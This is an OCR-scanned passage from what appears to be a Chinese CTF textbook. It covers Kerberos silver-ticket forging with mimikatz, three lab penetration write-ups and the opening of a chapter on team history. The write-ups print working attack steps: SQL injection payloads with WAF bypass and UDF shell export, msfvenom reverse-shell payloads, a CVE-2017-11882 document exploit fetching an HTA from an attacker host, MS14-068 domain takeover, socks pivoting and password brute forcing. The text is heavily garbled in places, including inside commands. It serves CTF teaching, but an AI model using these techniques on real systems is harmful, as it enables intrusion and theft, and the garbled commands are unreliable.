要 访问 域 控 上 的 CIFS 服 务 (用 于 Windows 主 机 间 的 文件 共享 ) 来 重新 获取 权限 ， 而 生成 银 票据 需要 
获得 以 下 信息 :/domain，/sid，Vtarget (目标 服务 器 的 域名 全 称 ， 此 处 为 域 控 的 全 称 ) ，/service 
(目标 服务 器 上 需要 伪造 的 服务 ， 此 处 为 CIFS) ，/rc4 (计算 机 账户 的 NTLM Hash， 域 控 主 机 上 的 
计算 机 用 户 ) ，/user (要 伪造 的 用 户 名 ， 可 指定 任意 用 户 ) 。 假 设 前 期 已 经 在 域 控 上 执行 如 下 命令 
获取 信息 ， 结 果 见 图 12-5-9。 


mimikatz log "sekurLsa: :Logonpasswords" 
用 Mimikatz 生 成 并 导入 Silver Ticket，， 命 令 如 下 : 


k rtest /domain:scanf.com 
/sid:S-1-5-21-: 2256u21489-3054245480-2050417719 /target: DC.scanf .com 
/recey:83799921lcceelabbdeacHe90706luye7 /service 
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让 站 入 站 -Fr We | 


结果 见 图 12-5-10， 成 功 导 入 后 ， 此 时 融 可 以 成 功 访问 域 控 上 的 文件 共享 ， 见 图 12-5-11。 


还 可 以 通过 银 票 据 访 问 域 控 上 的 LDAP 服 务 得 到 krbtgt hash 生 成 金 票据 ， 只 需要 把 /service 的 名 称 改 
为 LDAP， 人 生成 并 导入 票据 见 图 12-5-12。 


国民 s 汪 -9 








图 12-5-10 


图 12-5-11 


图 12-5-=12 
读者 可 以 目 行 测试 (清除 之 前 生成 的 CIFS 服 务 票 据 ， 表 生成 LDAP 服 务 票据 ) ， 试 试 此 时 能 否 访 问 域 


控制 器 的 文件 共享 服务 。 
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然后 通过 mimikatz 可 成 功 获 取 krbtgt 账 尸 信息 〈 结 果 见 图 12-5-13) : 








图 12-5-13 
HAR AA DMA A EA hl Aa MR A i yh 
adsecurity 
.Org/? p=1515., 
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12.6 靶场 渗透 案例 

在 CTF 中 ， 渗 透 题 目 往往 环境 较为 复杂 ， 但 是 由 于 成 本 和 防止 出 现 非 预期 解 的 出 现 ， 目 前 环境 一 般 是 
多 层 网 络 腐 套 。CTF 的 渗透 题 与 真实 渗透 存在 最 明显 的 区 别 就 是 ， 在 CTF 中 一 定 是 有 解 的 ， 并 且 解 题 
的 过 程 中 每 个 点 的 信息 都 很 关键 ， 包 括 邮 箱 、 链 接 、 网 站 的 文章 等 。 所 以 ， 参 赛 者 需要 得 跟 上 出 题 人 
的 想法 ， 仔 细 留 意 题目 中 所 透露 的 信息 。 

下 面 笔 者 将 会 对 以 往 做 过 的 真题 进行 讲解 ， 由 于 题目 环境 早已 不 存在 ， 所 以 细节 不 会 深究 ， 主 要 是 为 
了 让 读者 多 了 解 思 路 。 


12.6.1 第 13 届 CUIT 校 赛 渗 透 题 目 


题目 描述 : 三 叶 草 影视 集团 最 近 准 备 向 电影 圈 进 军 ， 设 计 网 络 架构 到 安全 防护 措施 方案 ， 忙 忙碌 碌 的 
准备 了 两 个 月 ， 今 天 终于 要 上 绪 啦 ! http://www.rootk.pw/。 


第 一 个 flag 在 后 台中 。 第 二 个 flag 在 管理 员 的 个 人 计算 机 上 ， 不 知道 个 人 机 器 是 哪个 ， 反 正 是 挺 安全 
的 一 个 个 人 机 器 。 


1. 信息 收集 


对 域名 进行 whois 查 询 ， 发 现 是 有 隐私 保护 的 ， 这 时 可 以 选择 一 些 威胁 情报 的 平台 查询 ， 因 为 其 中 会 

保 仔 一些 历 史 的 whois 人 信息。 在 微 步 上 进行 查询 可 以 发 现 一 些 信 息 ， 见 图 12-6-1。 可 知 邮箱 为 
vampa 

@rootk.pw， 注 册 人 为 Zhou Long Pi。 


通过 子 域名 爆破 ， 可 以 了 解 到 还 存在 一 个 mail.rootk.pw 邮 箱 系统 ， 表 根据 之 前 whois 信 息 中 的 


vamp 


用 户 名 ， 放 入 社工 库 查 询 ， 可 以 得 到 一 些 密码 信息 ， 见 图 12-6-2。 


Zhou Long Pi (相关 域名 0 个 ) 
Zhou Long Pi 


vampair@rootk.pw (相关 域名 0 个 ) 


+86.13735263745 
注册 时 间 2017-03-20 00:00:00 
过 期 时 间 2018-03-20 00:00:00 
更 新 时 间 2017-03-21 00:00:00 
域名 服务 南 Xin Net Technology Corp. 
域名 服务 器 f19g1ns2.dnspod.net figins1.dnspod.net 


vampair@eyou,com Nrdsdhd [mop] 
毒 娃 C 4621522 vampair@126.com [tianya] 


法 尔 考 拉克 19840810 vampair@gmail.com [tianya] 
vampair 327218 www.sohu@monkey.com [tianya] 


吸血 鬼 一 伯 栈 86cb49ef9709d81c5a70db67062bec00 929253456@qq.com vampair [shengda] 
12-6-2 
最 终 通过 各 种 组 合 ， 可 以 使 用 密码 19840810 进 入 邮箱 系统 ， 见 图 12-6-3。 
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四 I! 7 


图 12-6-3 
其 中 有 个 邮件 提 及 一 个 DNS 系统 : http://dns-manage.rootk.pw: 8080/index.php， 并 且 由 it_ 
manager@rootk.pw 发 送 。 


2. 主 站 渗透 
查看 www.rootk.pw 的 DNS 信息 ， 发 现 使 用 了 百度 CDN ， 见 图 12-6-4。 
见 寻 找 CDN 背 后 网 站 的 真实 IP 有 以 下 方式 : 
信子 域名 解析 IP: 可 能 两 个 站 点 使 用 同一 台 服 务 器 ， 但 是 只 对 主 站 进行 了 CDN 保 护 。 
: 一 些 公开 平台 提供 的 域名 历史 解析 记录 。 
寻找 信息 泄露 文件 : phpinfo。 


De 服务 器 漏洞 : SSRF 请 求 。 


图 12-6-4 


通过 测试 发 现 ，mail.rootk.pw 和 www.rootk.pw 是 同一 个 IP， 所 以 可 以 通过 改变 本 地 host 来 绕 过 
的 一 些 防护 。 


在 www.rootk.pw 可 以 看 到 一 个 链接 : http://www.rootk.pw/single.php? id=2， 通 过 测试 发 现 
仓 任 SQL 注入 漏洞 。 通 过 单 规 的 SQL 注入 操作 得 到 如 下 信息 。 


@ 数 据 库 名 : 


http://www.rootk.pw/single.php?id=0'union/**/select/*x*/1, (select/**/SCHEMA_NAME/x**/from/**/info 
rmation_schema.SCHEMATA/**/Limit/**/1,1); 


movie 表 名 : 


http://www.rootk.pw/single.php?id=0'union/**/select/**/1, (select/**/table_name/**/from/**/infor 
mation_schema .TABLES/x**/where/*wx*/TABLE_SCHEMA="'movie'/xx/Limit/**/0,1); 


@movie 表 的 字段 : 


http://www.rootk.pw/single.php?id=0'union/**/select/**/1, (select/**/COLUMN_NAME/**/from/**/info 
rmation_schema.COLUMNS/**/where/xx*/TABLE_SCHEMA="'movie' /x*/and/**/TABLE_NAME="'movie'/**/Limit/**/1,1); 


@ 数 据 库 结构 : 
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— movie 
+ movie 
—- content 
- name 
三 aa| 
— temp 
+ temp 
—- content 
ld 


没有 找到 敏感 信息 ， 通 过 user() 查 看 当前 用 户 权限 。 


http://www.rootk.pw/single.php?id=0'/xx/union/**/select/**/1,user(); 


当前 用 户 权 限 显示 : 


利用 load file 读 取 文件 ， 友 现 有 FILE 权 限 : 


http://www.rootk.pw/single.php?id=0'/**/union/**/select/**/1,load_file('/etc/passwd'); 


通过 into outfile 发 现 也 能 导出 文件 : 


http://ww.rootk.pw/single.php?id=0'union/**/select/**/1, 'Lemonlemon'/**/into/**/outfile/**/' /tmp/Lemon.txt'; 
http://www.rootk.pw/single.php?id=0'union/**/select/**/1, (load_file('/tmp/Lemon.txt')); 


尝试 进行 导出 UDF 来 拿 到 一 个 shell: 


http://www.rootk.pw/single.php?id=0'union/**/select/**/1, (select/**/@@plugin_dir); 


发 现 插件 路 径 为 : 


由 于 UDF 文 件 过 大 ， 一 般 是 将 其 内 容 Hex 编 码 ， 分 段 插 入 某 个 字段 ， 最 后 连接 字符 串 导 出 到 SO 文件 


中 ， 但 是 经 过 测试 发 现 ，insert/update/delete 都 被 拦截 ， 见 图 12-6-5。 


LoadURL http://www.rootk.pw/single.php?id=0';insert; 
Wsplit URL 
1 Execute 

Enable Post data Enable Referrer 


图 12-6-5 


这 里 可 以 使 用 MySQL 预 查询 来 绕 过 WAF: 


SET 6@SQL=0x494E5345525426494E544F206D6F76696520286E616D652C20636F6E74656E74292656414C554553 
20282761616161272C27616161612729; PREPARE pord FROM @SQL;EXECUTE pord; 


= 


9x494E5345525420494E544F266D6F76696529286E616D652C20636F6E74656E74292056414C5545532928276161616 
1272C27616161612729 


解码 就 是 : 


INSERT INTO movie (name, content) VALUES ('aaaa','aaaa!') 


在 插入 前 最 好 确认 系统 版 本 ， 以 防 出 现 Can't open shared library 问 题 。 
通过 查询 : 


http://www.rootk.pw/single.php?id=0'union/**/select/**/1, (load_file('/etc/issue')); 


得 到 系统 版 本 为 : 


CentOS release 6.9 (Final) Kernel \r on an Nm 


因为 sqlmap 的 udf.so 测 试 失败 ， 所 以 可 以 下 载 一 个 CentOS 6.9， 然 后 重新 编码 udf.so。 由 于 库 站 分 


窗 ， 数 据 库 服 务 器 是 外 网 隔离 的 ， 所 以 只 能 通过 此 注入 点 来 上 传 文 件 。 兄 六 为 URL 长 度 是 有 限 千 
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的 ， 所 以 需要 分 批 次 插入 。 最 终 通 过 UDF 就 能 执行 系统 命令 。 
进行 信息 收集 ， 发 现 admin log-manage 的 脚本 : 


http://www.rootk.pw/single.php?id=0'union/**/select/**/1, load_file('/tools/admin_log-manage.py'); 


中 包含 了 一 些 信息 : 


DNS 的 后 台 账 户 密码 为 : 


data={ 
'user' : 'heLLoo'， 
'pass' : 'syclover' 
二 
password = "it_manager@123@456" 
to_addr = it_manager@rootk .pw 


在 mail.rootk.pw 上 登录 it manager@rootk.pw 账 号 ， 根 据 拓 扑 图 ( 见 图 12-6-6) 可 知 网 络 存 在 两 个 
段 : DMZ (9 段 ) 和 服务 段 (10 段 ) 。 


{ 三 叶 草 影视 集团 邮件 系统 》 


# 收 件 箱 (5) 发 件 人 : 皮 州 龙 [vampair@rootk.pw] 
[1] 端午 祝福 时 间 : 2017-03-22 

[2] 欢迎 新 员工 ! 

[3] 安全 通告 

[4] 公司 新 业务 的 网 络 规 划 

[5] 网 络 规 划 如 何 了 ? 


图 12-6-6 
然后 通过 上 面 的 密码 进入 DNS 少 理 平台 ， 友 现 是 能 控制 后 台 域 名 admin_log.rootk.pw 解 析 的 ， 见 图 ， 
-6-7。 将 解析 地 址 改 为 外 网 IP， 做 一 个 转 友 再 到 这 个 原来 服务 器 的 IP ， 这 样 残 能 进行 钓鱼 。 














图 12-6-7 
利用 EarthWorm 进 行 痕 口 转发 : 


使 用 tcpdump 获 取 所 有 流量 : 


最 终 可 以 在 流量 中 看 到 登录 http://admin log.rootk.pw 系 统 的 信息 ， 其 中 账号 密码 为 | | 
NAM LeMIFaNe [all 
/H7e27PQaHQ8Uefgj， 见 图 12-6-8。 
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FST /Jingex.pho HTP/II.L 
iccapt -Encoding: identiry 
Content Lengrh: 49 

Most advin log,rootk,pw 
Content Typet spplication/x we form urlencoded 
Conmwection: close 

User mae python -ur ilib/2.6 





Date: Sat, 27 Hey 2 3017 18: 取 :62 Gf 
Content-Type: -my 


Conmction: close 
N-Powered-®y; NP/S,4,45 
184275961 arm/ 


Sat-Cockie: 
rd de hepa 
Se no-stere, mst-revalidste, post-check"®0, pre-check=0 
Sragre; no-rache 


Co Yswindew. loc ntion. beefe main.php iclscripty 
i 

shtml langs zh 
hesd> 


| 却 汪 ;8 三里 季 ;1700.7 "各 地 时 二 9015 


图 12-6-8 
登录 后 便 可 以 获得 第 一 个 flag : 
深入 内 网 
对 内 网 进行 探测 ， 发 现 10.10.10.200 存 在 9000 妆 口 ， 可 以 php-fpm 未 授权 访问 。 


python fpm.py 10.10.10.200 /usr/share/pear/PEAR.php -c '<?php system("id");?>’ 


于 是 有 反弹 shell， 进 入 10.10.10.200 服 务 器 。 为 了 方便 ， 可 以 将 其 在 metasploit 上 线 : 


msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=vpsip LPORT=port -f elf > shell.elf 


见 图 12-6-9。 
接 下 来 向 9 网 段 渗 透 ， 先 metaspliti 设 置 路 由 : 


使 用 永恒 之 监 探 测 : 


EU 

















图 12-6-9 





图 12-6-10 
友 现 10.10.9.230 存 在 漏洞 ， 利 用 漏洞 即 可 获取 shell。 然 后 发 现 当 前 Windows 有 人 远程 连接 到 10.10. 
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9.230， 并 且 将 他 的 磁盘 映射 到 了 230， 通 过 mimikatz 模 拟 用 户 去 执行 命令 ， 最 终 可 以 获取 到 映射 磁 
盘 的 内 容 ， 从 而 拿 到 最 后 一 个 flag， 见 图 12-6-11。 


图 12-6-11 


.6.2 DefCon China 轰 场 题 


页 流程 见 图 12-6-12。 


192. 168. 1. 254 
word click bot 


192. 168. 2. 112 
AD-PC 个 人 机 


一 日 一 日 一 自 | | 


172. 16. 8. 8 192. 168. 1.2 192. 168. 2. 114 192. 168. 2. 104 
wordpress word click server tomcat 


192. 168. 2. 10 
AD 域 -DC 域 控 


图 12-6-12 


1. wordpress 


192.168.1.2 打 开 是 一 个 wordpress 应 用 ， 先 使 用 wpscan 对 它 进行 插件 扫描 、 账 号 密码 爆 艳 ， 友 现 后 
全 的 账号 密码 为 admin/admin， 也 通过 猜 解 测试 到 这 合计 算 机 的 SSH 的 账号 密码 为 root/admin， 这 
EE ANE PU USE 


Ek 
2. Word 文 档 钩 鱼 


在 apache 配 置 中 可 以 发 现存 在 8000 端 口 ， 其 Web 路 径 是 wordpress 下 的 上 传 文件 目录 ， 获 取 apache 
配置 如 图 12-6-14。 
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图 12-6-14 
从 HTTP 的 log 观 察 到 存在 一 个 bot， 每 隔 一 段 时 间 会 去 请 求 report.doc， 见 图 12-6-15。 三 并 性 用 
-2017-11882 利 用 成 功 ， 步 又 如 下 。 


E 


(1) 由 于 比赛 外 于 内 网 环境 问题 ， 导 致 shel 上线 十 分 太 顶 ， 这 里 需要 先 做 ssh 的 册 口 转发 将。 
WA@)I ress 
机 跟 192.168.1.2 作 为 跳板 ， 


CI MA dN 
者 触发 恶意 文件 时 ， 先 连接 192.168.1.2 的 13339 端 口 ， 再 通过 192.168.1.2 的 端口 转发 ， 会 将 流量 转 
发 到 攻击 者 的 13338 端 口 。 





图 12-6-15 


msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=13339 -f hta-psh -0 a.hta 


(3) 使 用 Exp 生 成 悉 意 DOC 文 件 。 


python CVE-2017-11882.py -c "mshta http://192.168.1.2:8000/a.hta" -o test.doc 


(4) 使 用 metasploit 监 听 13338 端 口 。 


use multi/handler 

set payLoad windows/meterpreter/reverse_tcp 
set LHOST 0.0.0.0 

set LPORT 13338 

exploit -j 


最 终 利用 成 功 ， 得 到 一 个 192.168.2.1/24 段 的 shell: 192.168.2.114， 见 图 12-6-16。 








图 12-6-16 
在 C 盘 根 目 录 下 束 可 以 找到 flag 文 件 ， 见 图 12-6-17。 
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图 12-6-17 
3. Tomcat 


由 于 只 是 拿 到 192.168.2.114 机 器 ,为 了 扩大 权限 ， 可 以 通过 它 对 内 网 进行 下 一 步 的 侦查 。 


丰 学 土 


(1) 添加 路 由 ， 这 样 就 可 以 通过 Metasploit 访 问 192.168.2.1/24 的 计算 机 。 


run autoroute -s 192.168.2.1724 


(2) 进行 亲口 扫描 。 


use auxiliary/scanner/portscan/tcp 
set PORTS 3389,445,22,80,8080 

set RHoSTS 192.168.2.1/24 

set THREADS 50 

exploit 


metasploit 是 Socks4 代 理 ， 速 度 很 乙 ， 推 荐 使 用 Earthworm.。 


(3) 上 传 Earthworm 程 序 。 


meterpreter > upload /media/psf/Home/ew.exe c:/Users/RTF/Desktop/ 


(4) 192.168.1.2 (wordpress) 进行 SS 代理 监听 ， 开 放 一 个 10080 端 口 ， 作 为 代理 端口 。 


rcsocks -L 10080 -e 8881 


(5) 192.168.2.114 进 行 Socks 代 理 反 弹 到 192.168.1.2。 


C:/Users/RTF/Desktop/ew.exe -s rssocks -d 192.168.1.2 -e 8881 


Cg EES PT 0 EW 


对 内 网 的 机 器 进行 渗透 ， 发 现 192.168.2.104 开 放 了 端口 80、8080， 其 中 8080 为 Tomcat， 默 认 账 号 
密码 tomcat/tomcat 即 可 进入 。 然 后 部 署 war 包 ， 获 得 一 个 root 权 限 的 webshell， 在 root 目 录 下 得 到 | 


flag ， 见 图 12-6-18。 


€ 了 CO 192.168.2.104:8080/war/warjsp 
汪 应 用 9 ,u bl 


168.2.104:8080 (127.0.1.1) | copy 
Logout | File Manager | DataBase Manager | Execute Command | Shell OnLine | Back Connect | Java Reflect | Eval Java Code | Port Scan | Do 


J 


cat /root/flag 


Execute Program » 
Parameter 

Execute Shell » 

Parameter 


图 12-6-18 


在 192.168.2.104 上 进行 信息 收集 ， 在 /var/www/html/inc/config.php 文 件 中 发 现 MySQL 连 接 信 


三 辐 


/CO 。 


$DB=new MyDB("127.0.0.1", "mail", "mail1l23456", "my_mail"); 


查阅 数据 库 后 ， 友 现 内 网 某 台 计算 机 的 密码 为 admin@test.COM， 见 图 12-6-19。 


图 12-6-19 


4. Windows PC 


我 们 可 以 使 用 metasploit 中 的 smb_login 模 块 进行 账号 密码 爆破 ， 友 现 192.168.2.112 可 以 登录 成 


功 ， 见 图 12-6-20。 
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图 12-6-20 
为 了 方便 ， 这 里 将 3389 毁 口 转 上 登录， 然后 以 管理 员 权限 执行 木马 上 线 ， 见 图 12-6-21。 





























图 12-6-21 


5. 攻击 Windows 域 控 


列 进程 时 候 上 友 现 仔 在 域 用 户 ADNPC 进 程 ， 见 图 12-6-22。 











图 12-6-22 
用 mimikatz 模 块 进行 密码 抓 取 ， 密 码 也 是 admin@test.COM， 见 图 12-6-23。 


通过 net user 命 令 可 以 看 到 PC 用 户 只 是 一 个 普通 域 用户 ， 见 图 12-6-24.。 


图 12-6-23 
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名 12-6-24 
通过 net view 在 AD 域 下 找到 一 些 计 算 机 ， 由 于 remark 标 注 较 为 明显 ， 可 以 找到 域 控 是 \\DC， 见 图 12 
2 


12-6-25 
对 其 进行 ms14-068 测 试 ， 对 域 控 进 行 攻击 。 
https://github.con/abatehy17/WindonsExploits/tree/master/Ws14-068 
使 用 方法 为 : 


ms14-968.exe -u 起 成 员 名 @ 域 名 -s 域 成 员 sid -d 域 控制 器 地 址 -p 起 成 员 密码 
NMS14-068.exe -~u pcead.com -5 S-1-5-21-2251846888-1669998150-1970748266-1116 -d 192.168.2.16 -p 
admin@test .COM 


其 中 ， 域 成 员 的 sid 获 取 是 通过 迁移 进程 到 AD\PC 用 户 ， 然 后 进行 查看 ， 见 图 12-6-26。 


图 12-6-26 
利用 mimikatz 将 凭证 清除 : 
Minikatz .exe "kerberos: :purge” "kerberos: list” "edt 
广大 的 下 的 质证 


_mimikatz.exe "Kerberos::ptc TGT_pc@ad.com.ccache" | | 


最 终 便 可 和 直接 进入 域 控 ， 获 取 flag， 见 图 12-6-27。 
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图 12-6-27 


12.6.3 PWNHUB 深 入 敌后 


题目 描述 : http:/54.223.229.139/， 茶 止 转 上 友 入 口 IP 机 器 的 RDP 服 务 痛 口 ， 蔡 止 修改 任何 服务 器 密 
禁止 修改 删除 服务 器 文件 ; 葵 止 对 内 网 进行 拓扑 发 现 扫 拉 ， 必 要 信息 全 部 可 以 在 服务 器 中 获得 。 
文明 比赛 ， 和 谐 共 处 。 Hint: 


学 administrator: 啊 ， 好 烦 啊 ，Windows 为 哈 还 有 密码 策略 。 
学 因为 一 些 问题 ， 服 务 器 桌面 上 新 放 了 一 个 文件 ， 可 能 是 要 找 的 。 


% 入 口服 务 器 的 用 户 名 是 贞 写 的 ， 不 要 在 意 ; 禁止 对 内 网 进行 拓扑 发 现 扫描 ， 必 要 信息 全 部 
可 以 在 服务 器 中 获得 。 


1. getshell 


首先 通过 目录 扫 摘 友 现 flle 目 录 下 人 存在 .hg 目录 ， 利 用 工具 dvcs-ripper 下 载 相应 源码 : 


https://github.com/kost/dvcs-ripper 
perl hg.pl -v -u http://54.223.229.139/file/.hg/ 


上 友 现 仓 佳 registerphp ， 其 中 有 一 个 注册 用 户 的 代码 : dkjsfh98* (0* (vvv， 注 册 后 会 跳 转 到 上 传 
地 万 ，。 


文件 上 传 的 代码 如 下 : 


<?php 
session_start(); 
// Get the filename and make sure it is valid 
$filename = basename($_FILES['file']['name']); 
// Get the username and make sure it is valid 
$username = $_SESSION['userName']; 
if (!preg_match('/^[\w_\-]+$/', $username)) { 
echo "Invalid username"; 
header("Refresh: 2; url=files.php"); 
exit; 
} 
if (isset($_POST['submit'])) { 
$filename = md5(uniqid(rand())); 
$filename = preg_replace("/[^\w]/i", "", $filename); 
$upfiLe = $_FILES['file']['name']; 
$upfile = str_replace(';', "", $upfile); 
$tempfile = $_FILES['file']['tmp_name']; 
$ext = trim(get_extension($upfile)); // null 
if (in_array($ext, array('php', 'php3', 'php5', 'php7', 'phtml'))) { 
die('Warning ! File type error..'); 
} 
if ($ext == 'asp' or $ext == 'asa' or $ext == 'cer' or $ext == 'cdx' or $ext == 'aspx' 
or $ext == 'htaccess') { 
$ext = 'file'; 
} 
$full_path = sprintf("./users._file_system/%s/%s.%s", $username, $filename, $ext); 


(move_uploaded_file($_FILES['file']['tmp_name'], $full_path)) { 
header("Location: files.php"); 
exit; 


} 

else { 
header("Location: upload_failure.php"); 
exit; 

4 


SE h get ee 9 


Ee 
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return strtoLower(suDstr(3+1ile, Strrpos(stile, .+ IJJi 
} 


?> 


可 以 看 到 获取 文件 后 绥 的 主要 代码 如 下 : 
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$upfile = $_FILES['file']['name']; 
$upfile = str_replace(';’', "", $upfile); 
$tempfile = $_FILES['file']['tmp_name']; 


然后 对 后 缀 进 1 


流 进行 


制 ， 然 后 和 


$ext = 


J 黑 名 单 限制 ， 主 要 限制 了 .php、 
， 如 上 传 的 文件 为 1.php: 


叶 到 第 一 个 webshel。 


2. Windows 信 息 收 集 


十 ZX 昌 


因 侍 
台 对 其 他 方面 信息 进 


trim(get_extension($upfile)); 


: $data 时 ， 最 终 获 取 后 级 便 是 .php: 


.asp 等 常见 后 缀 ， 但 是 在 Windows 下 可 以 使 用 ADS 
: $data， 从 而 绕 过 限 


webshell 后 提 权 ， 再 利用 mimikatz 抓 取 系 统 的 明文 密码 为 : 233valopwnhubAdmin， 之 后 开 
友 现 其 中 存在 对 内 


网 172.31.5.95 机 器 的 连接 记录 。 


对 最 近 
\Recent, 


.Zip ( 读 取 IE 浏 览 器 


访问 文档 进行 查看 : 
见 图 12-6-28。 


回 ON mM 2 73 1 
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复 lensensd p19 jnx 


- ME 和 Ir 

- 和 As bind Yk 

” aTbeTl4bIOYPe di eS Te) zip ly 
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mm) SS454TMCOD3I04CLTTO4G 101L phy 1 
wm) diktep isd lok 
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) SP er ps 1 

i) PeoverSpleit wuster riy. Lak 
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关 99023771 86 ny lw 
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图 12-6-28 
从 时 间 上 可 以 推断 2017-1-11 开 始 部 署 题 目 ， 表 使 用 了 GPP 的 powershell 脚 本 、3389 爆 破 工具 、 


因为 存在 iepv 工 具 ， 则 重心 偏向 浏览 器 方面 的 信息 收集 
://www.nirsoft.netVyutils 人 web browser password.htm) 对 浏览 历史 进 


由 2 


上 友 现 了 http://www.nirsoft.net/ ot 访问 ， 
器 保存 的 密码 ， 因 为 搭建 环境 问题 ， 


gs 
UE 
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Entry Name 


Type 


图 12-6-29 


: AutoComplete 


Stored In : Registry 
User Name : iamroot 
Password : abc@elk 
Password Strength : Medium 


: https://wnw.baidu.com/ 


这 并 没有 获取 到 密 


井 行 收集 。 其 内 网 IP 为 172.31.2.182。 软 件 列表 中 存在 xshell, 


时 局 ~ 火 小 


2917-0114 曙 站 身 


2017-01-14 :于 : 知 


917"01"11 W321! re 


2917-01-11 的 -44 为 之 


O17"01*1) 09°52'2¢ 


2917-01-11 的 :4 苇 


的 和 - 失 洽 科 ;35; 媳 


6" 寺 "! 夫 的 3.0% 站 


Wo" 0 


WG"12"1| 17 42'4) 9 


区 中 -过 -1 1 Wi1¢ 


人 四 - 挫 11 4 和 


20106"12"11 17-26:07 5 


W021 10 29. 


2016"12"11 16°16'55 E 


i612-1] 16:15:07 ,3 


06"1S-1} 16 .01.00 


Wi6"1"11 16.%:.% 


W021 10 .0.44 


W612-11 16°0%'3 


W012" 16°0510 


密码 ) 工具 ， 应 该 是 出 题 人 为 了 测试 题目 而 做 的 一 些 准 备 。 


。 所 以 放出 了 Hint。 


0866 
OBAL 
ma 
OA 
0866 
ORAL 
COAL 
0040 
OA 
0OB46 
A 
CCLL 
006 
UN 
(0566 
[9 


(AU IIEAVAT [TT Te AVAYo] EEC MOV To Ro Ede EAA NA 


[oN 


。 首先 使 用 WebBrowserPassView ( 
行 记录 ， 


http 
具体 分 析 见 图 


也 束 是 查看 浏 
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可 以 利用 ubuntu/abc@elk 登 录 到 之 前 Xshell 收 集 到 的 服务 器 : 172.31.5.95。 


3.LinuxX 信 息 收 集 


Linux 主 要 人 在 /varvlog/ 目 录 下 翻 各 类 Log 日 志 ， 如 系统 日 志 ， 见 图 12-6-30。 








图 12-6-30 
也 可 以 用 find 命 令 寻 找 最 近 修改 的 文件 : 


分 析 登 录 日 志 ， ne 可 知 从 2017-1- 12 后 便 未 登录 过 才 系 统 。 最 后 从 ARP 表 
得 到 另 一 个 |P 地 址 : 172.31.13.133。 
SEE 


通过 辛 口 扫描 172.31.13.133 ( 见 图 12-6-31) ， 发 现 开 局 了 3389 痛 口 ， 开 放 了 135、139、445 痛 
口 ， 基 本 可 以 确认 是 一 台 Windows 服 务 器 。 


图 12-6-31 
然后 根据 Hint: “administrator: 啊 ， 好 烦 啊 ，Windows 为 哈 还 有 密码 策略 。” 


通过 查看 Windows 密 码 策 略 友 现 其 要 求 如 下 : 
学 不 得 明显 包含 用 户 名 或 用 户 全 名 的 一 部 分 
攻克 全 作为 6 个 天 体 ， 


学 包 合 以 下 4 类 中 的 3 个 字符 : 喘 文 大 写字 母 (A~Z) ， 喘 文 小 写字 母 (a~Zz) ，10 个 基本 数 
字 (0~9) ， 非 字母 字符 (如 ! 、$、#、%) 。 


根据 之 前 1E 收 集 的 密码 为 abc@elk， 管 理 员 为 了 方便 记忆 ， 应 该 只 是 将 其 中 的 大 小 写 进行 转换 ， 如 
@elk， 所 以 可 以 通过 hydra 进 行 爆破 ， 得 到 密码 为 abc@ELK， 见 图 12-6-32。 
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赎 12-6-32 


得 flag ， 见 图 12-6-33。 


名 12-6-33 
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小 结 


本 章 主要 介绍 了 企 Windows 和 Linux 上 如 何 搭建 弟 见 漏洞 利用 的 工具 环境 、 章 见 漏洞 的 利用 方法 和 部 
分 原理 ;结合 部 分 场景 对 一 些 攻击 手法 进行 演示 ， 通 过 历史 比赛 的 靶场 案例 进行 思路 的 拓展 。CTF 参 
赛 者 组 合 使 用 本 章 介绍 的 部 分 技术 ， 会 大 大 提高 园 场 渗 透 的 成 功 几率 。 不 过 在 擎 握 这 些 基 础 的 渗透 知 
识 后 ， 参 赛 者 依然 需要 自行 进行 深入 的 学 习 ， 才 能 在 实际 环境 中 融会 贯通 。 同 时 ,我 们 也 提供 了 一 看 
No = 


至 此 ， 本 书 的 技术 章节 告 一 段 洲 ， 和 希望 读者 在 读 完 本 书后 会 有 所 收获 。 下 一 篇 中 ， 我 们 将 结合 Nu1 
战队 的 成 长 历程 ， 摘 绘 “ 赛 棍 ” 眼 中 的 CTF 世 界 。 
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CTF 之 团队 建 芭 


第 13 章 我 们 的 避 队 


几 年 前 ， 我 (Venenof7， 下 同 ) 碍 找 网 络 安 全 相关 词语 时 ， 在 百度 百科 看 到 “NULL” 这 个 英文 年 
词 ， 意 思 是 “ 零 值 的 、 空 的 ”， 于 是 自然 地 想到 在 这 个 “0” 和 “1” 构 成 的 计算 机 世界 里 经 常会 遇 到 
NULL 的 场景 。 从 “0” 到 “1”， 从 “1” 到 “co”， 这 便 是 “Nu1L” 的 合 义 ， 更 是 我 们 战队 始终 如 
一 的 追求 。 


Nu1L 战 队 最 开始 只 有 4 个 人 ， 组 队 的 过 程 是 偶然 ， 也 是 命运 的 必然 。 


2015 年 ， 我 在 参加 北 理工 |ISCC 线 下 赛 时 ， 与 Albertchang 结 识 。 而 Albertchang 与 kow、Marche 
分 到 -组 ， 获 得 了 当年 的 决赛 冠军 。 在 同年 10 月 份 的 XDCTF 线 上 赛 前 ， 我 与 还 在 清华 附中 上 学 的 

在 一 个 逆向 QQ 和 群 内 偶然 相识 ， 相 谈 甚 欢 ， 一 担 即 合 ， 决 定 组 队 参 赛 。 比 赛 时 ，Misty 成 功 AK 了 上 
有 逆向 题目 进入 前 十 ， 也 让 我 们 获得 了 参加 线 下 赛 的 机 会 。 巧 的 是 ， 此 时 绿 盟 在 西安 也 办 了 一 个 线 下 
赛 。 机 缘 巧 合 下 ， 我 和 Albertchang 又 一 次 见面 了 。 这 次 见面 ， 我 们 默契 地 觉得 是 时 候 “ 搞 点 事情 
了 ”， 于 是 我 、Misty、Albertchang、Marche147 的 四 人 战队 瓯 此 成 立 。 


一 个 战队 有 了 名 字 ， 有 了 人 ,， 便 有 了 前 景 和 希望 。Nu1L 战 队 是 幸运 的 ， 从 诞生 到 成 长 吸纳 了 越 来 越 
多 身 怀 轶 才 和 梦想 的 人 ， 集 星星 之 火 ， 燃 烧 热 血 青春 ， 让 战队 在 CTF 圈 内 占 得 了 一 席 之 地 。 
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ss 二 正二 自生 无 2 


在 CTF 世 界 中 ， 很 少 有 人 能 够 做 到 像 美 国 神奇 小 子 Geohot 和 刘 大 和 爷 Riatre 一 样 ， 是 一 个 全 栈 选 手 ， 能 
够 以 一 人 之 力 对 抗 一 个 战 了 从。 所以， 大 多 数 顶尖 CTF 战 队 都 是 基于 一 个 学 校 或 者 多 个 群体 ， 由 多 人 给 
成 。 而 对 于 Nu1L 文 样 一 个 联合 战队 ， 如 何 凝 聚 力量 ， 进 友 持 续 战 斗 力 便 成 了 天 键 。 


